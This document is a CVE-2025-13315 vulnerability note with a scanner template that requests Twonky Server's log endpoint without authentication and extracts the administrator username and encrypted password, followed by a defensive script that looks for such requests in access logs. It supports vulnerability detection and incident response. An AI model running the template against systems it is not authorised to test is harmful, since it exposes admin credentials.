Vulnerability Description
Twonky Server 8.5.2 contains a broken access control vulnerability: authentication for the web service API can be bypassed, letting unauthenticated attackers read log files that contain administrator credentials. Exploitation requires no authentication.
id: CVE-2025-13315

info:
  name: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
  author: pussycat0x
  severity: critical
  description: |
    Twonky Server 8.5.2 contains a broken access control vulnerability caused by bypassing web service API authentication, letting unauthenticated attackers read log files with administrator credentials, exploit requires no authentication
  impact: |
    Unauthenticated attackers can read sensitive log files containing administrator usernames and encrypted passwords.
  reference:
    - https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
  metadata:
    verified: true
    zoomeye-query: app="Twonky Server"
  tags: cve,cve2025,twonky,server,exposure,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/nmc/rpc/log_getfile"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"server_main_impl","LOG_SYSTEM:","upnp_ini_file")'
        condition: and

    extractors:
      - type: regex
        name: username
        group: 1
        part: body
        regex:
          - 'accessuser =([ a-zA-Z0-9]+)'
        internal: true

      - type: regex
        name: password
        part: body
        group: 1
        regex:
          - 'accesspwd =([ :a-zA-Z0-9]+)'
        internal: true

      - type: dsl
        dsl:
          - '"Username :"+ trim(username, "[ ]")'
          - '"EncryptedPassword :"+ trim(password, "[ ]")'
# digest: 490a00463044022026f84abc20c01fe0bf585ae38796fd4a924f723858d5db69f63b57a991322679022042a183363ad913a0d0a392fbce290dd06ada79a7458fbb4904704d5f0b639749:922c64590222798bb761d5b6d8e72950
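For the defending side, the request this template sends can be hunted for in web access logs. The following is an added example, not part of the template or of its author's work: it assumes a reverse proxy in front of Twonky Server that writes Combined Log Format, and the function names and sample lines are hypothetical and constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Endpoint requested by the template above.
LOG_ENDPOINT = "/nmc/rpc/log_getfile"

# Assumption: a reverse proxy in front of Twonky writes Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Dec/2025:10:00:01 +0000] "GET /nmc/rpc/log_getfile HTTP/1.1" 200 48211 "-" "-"',
    '198.51.100.7 - - [01/Dec/2025:10:02:13 +0000] "GET /nmc//rpc/%6cog_getfile?x=1 HTTP/1.1" 200 48230 "-" "-"',
    '203.0.113.5 - - [01/Dec/2025:10:05:40 +0000] "GET /nmc/rpc/log_getfile HTTP/1.1" 401 0 "-" "-"',
    '192.0.2.10 - - [01/Dec/2025:10:06:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "-"',
]

def normalize_path(target: str) -> str:
    """Drop the query string, decode percent-escapes, collapse slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).rstrip("/").lower()

def find_log_reads(lines):
    """Return {source_ip: [(timestamp, status, served)]} for requests to LOG_ENDPOINT."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or normalize_path(m["target"]) != LOG_ENDPOINT:
            continue
        # The template treats HTTP 200 as a served log file; mirror that here.
        served = m["status"] == "200"
        hits[m["ip"]].append((m["ts"], int(m["status"]), served))
    return dict(hits)

def exposed_sources(hits):
    """Source IPs that received at least one 200 response for the log endpoint."""
    return sorted(ip for ip, events in hits.items() if any(e[2] for e in events))

if __name__ == "__main__":
    found = find_log_reads(SAMPLE)
    for ip in exposed_sources(found):
        print(ip, found[ip])
```

Any source returned by `exposed_sources` was sent the log file, so the administrator credentials recorded in it should be treated as disclosed.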